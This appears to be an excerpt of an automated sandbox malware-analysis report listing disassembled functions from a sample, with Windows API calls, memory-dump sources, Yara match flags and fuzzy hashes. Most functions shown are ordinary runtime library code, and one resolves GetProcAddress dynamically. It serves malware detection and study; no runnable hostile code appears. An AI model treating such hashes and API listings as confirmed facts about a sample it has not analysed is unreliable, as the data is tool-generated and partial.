                                                    • API String ID: 2299586839-711371036
                                                    • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                    • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                    • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                    • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                    Function 0252B9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0252BCF4,?,00000000), ref: 0252BA6E
                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0252BCF4,?,00000000), ref: 0252BA97
                                                    • GetACP.KERNEL32(?,?,0252BCF4,?,00000000), ref: 0252BAAC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID: ACP$OCP
                                                    • API String ID: 2299586839-711371036
                                                    • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                    • Instruction ID: 92436fc01afdb4ccfc49c3d224f98b5bf1e02994e038ade0819ed61aca4d3191
                                                    • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                    • Instruction Fuzzy Hash: 0C21B832A00125AAE7348F54D901BA77BA6FB42F1CB468565E909D71C4F732DE48C358
                                                    Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                    • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                    • String ID:
                                                    • API String ID: 2287132625-0
                                                    • Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                    • Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
                                                    • Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                    • Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
                                                    Function 0252BBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 025221A0
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221AD
                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0252BCB5
                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0252BD10
                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0252BD1F
                                                    • GetLocaleInfoW.KERNEL32(?,00001001,02520A1C,00000040,?,02520B3C,00000055,00000000,?,?,00000055,00000000), ref: 0252BD67
                                                    • GetLocaleInfoW.KERNEL32(?,00001002,02520A9C,00000040), ref: 0252BD86
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                    • String ID:
                                                    • API String ID: 2287132625-0
                                                    • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                    • Instruction ID: c84fc016986fa59997f97a531781f67e9754105dd158cbf3282ec6f58dfba2ba
                                                    • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                    • Instruction Fuzzy Hash: 21519572A002279BDB14DFA5DC40BBE7BB9FF56708F040525E900E72D0EB719909CB69
                                                    Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C$C
                                                    • API String ID: 0-238425240
                                                    • Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                    • Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
                                                    • Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                    • Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
                                                    Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
                                                    • _wcschr.LIBVCRUNTIME ref: 0043B17C
                                                    • _wcschr.LIBVCRUNTIME ref: 0043B18A
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                    • String ID:
                                                    • API String ID: 2444527052-0
                                                    • Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                    • Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
                                                    • Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                    • Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
                                                    Function 0252B271 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02520A23,?,?,?,?,0252047A,?,00000004), ref: 0252B353
                                                    • _wcschr.LIBVCRUNTIME ref: 0252B3E3
                                                    • _wcschr.LIBVCRUNTIME ref: 0252B3F1
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02520A23,00000000,02520B43), ref: 0252B494
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                    • String ID:
                                                    • API String ID: 2444527052-0
                                                    • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                    • Instruction ID: 40714d8749c820c4df33e0d1d1c054d32cb72676b790ffcf9f4225ec108205c0
                                                    • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                    • Instruction Fuzzy Hash: 72611971600327AAEB24AB34CC81BBA77ADFF56718F14442AE905D71C0EB74D548CBA8
                                                    Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorInfoLastLocale$_free
                                                    • String ID:
                                                    • API String ID: 2834031935-0
                                                    • Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                    • Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
                                                    • Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                    • Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
                                                    Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                    • Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
                                                    • Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                    • Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
                                                    Function 0251A63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,024FDAD7), ref: 0251A732
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,024FDAD7), ref: 0251A73C
                                                    • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,024FDAD7), ref: 0251A749
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                    • Instruction ID: 79e5c6c7cc23fe988959f921fb1648d0cce847084bb8f89d4d6f2ee32ce27e68
                                                    • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                    • Instruction Fuzzy Hash: 3431C47490121D9BDB21DF64DD8879CBBB8BF48710F5042EAE40CA72A0E7309B85CF49
                                                    Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                    • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                    • ExitProcess.KERNEL32 ref: 0042FE99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                    • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                    • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                    • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                    Function 025200C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000000,?,0252009C,00000000,00457970,0000000C,025201F3,00000000,00000002,00000000), ref: 025200E7
                                                    • TerminateProcess.KERNEL32(00000000,?,0252009C,00000000,00457970,0000000C,025201F3,00000000,00000002,00000000), ref: 025200EE
                                                    • ExitProcess.KERNEL32 ref: 02520100
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                    • Instruction ID: 1dd3f8aea5f2d484e75243de699cafc562ab42ad7bc02c8f6564c308e84ce17b
                                                    • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                    • Instruction Fuzzy Hash: E0E04635002158ABCF116F54CD0CA583F6AFB42B82B400024F9048B1F0CF36DA46DB48
                                                    Function 024F092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$GetProcAddress.$l
                                                    • API String ID: 0-2784972518
                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                    • Instruction ID: 8cc2ddee45e4730f41419645bc1fe682aa102da875142fd5a7aad30607f3018e
                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                    • Instruction Fuzzy Hash: 41318AB6900609CFEB10CF99C880AAEBBF9FF88324F14504AD941A7315D771EA45CFA4
                                                    Function 004389F2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: /
                                                    • API String ID: 0-2043925204
                                                    • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                    • Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
                                                    • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                    • Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58
                                                    Function 02528C59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: /
                                                    • API String ID: 0-2043925204
                                                    • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                    • Instruction ID: 9ca36b455f7922095f0beb625d8031953c7331f29e19d7038973462893e9461c
                                                    • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                    • Instruction Fuzzy Hash: 78412872500229AECB249FB9CC4CEAB7B79FF81714F104268E905DB1C0E3319D49CB68
                                                    Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID: GetLocaleInfoEx
                                                    • API String ID: 2299586839-2904428671
                                                    • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                    • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                    • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                    • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                    Function 0251ED47 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                    • Instruction ID: 5950252d3c26b2f19fc9407f4483f4889235d2af22bd0bbcbaea74ffe3e30164
                                                    • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                    • Instruction Fuzzy Hash: 94021C71E012199BEF14CFA9C8807ADBBF1FF88324F258269D919E7384D731A941CB94
                                                    Function 024F2605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 024F262C
                                                    • PostQuitMessage.USER32(00000000), ref: 024F27CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessageNtdllPostProc_QuitWindow
                                                    • String ID:
                                                    • API String ID: 4264772764-0
                                                    • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                    • Instruction ID: bf0feea46b843a352f51c93ab1ff5354e74433a0940573ae3d75eb3dd7d21000
                                                    • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                    • Instruction Fuzzy Hash: 3A41212596438495E731FFA5BC45B2637B0FF64B26F10252BD628CB2B2E3B28540C75E
                                                    Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID:
                                                    • API String ID: 3997070919-0
                                                    • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                    • Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
                                                    • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                    • Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44
                                                    Function 02526F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02526F21,?,?,00000008,?,?,0252F3E2,00000000), ref: 02527153
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID:
                                                    • API String ID: 3997070919-0
                                                    • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                    • Instruction ID: 5fe8a4b42b9c57a46b4e3efd9e35a96b914f89fa2f85b985904a258b97838592
                                                    • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                    • Instruction Fuzzy Hash: 80B15D322106199FD715CF28C486B65BFE0FF4A368F258658E899CF2E5C335D989CB44
                                                    Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free$InfoLocale
                                                    • String ID:
                                                    • API String ID: 2955987475-0
                                                    • Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                    • Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
                                                    • Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                    • Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
                                                    Function 0252B8AC Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 025221A0
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221AD
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0252B900
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$_free$InfoLocale
                                                    • String ID:
                                                    • API String ID: 2955987475-0
                                                    • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                    • Instruction ID: f1b5704bc91d4424d9f26127ade7aac5a3c5f5c6e7a1c5cac483119936faf3db
                                                    • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
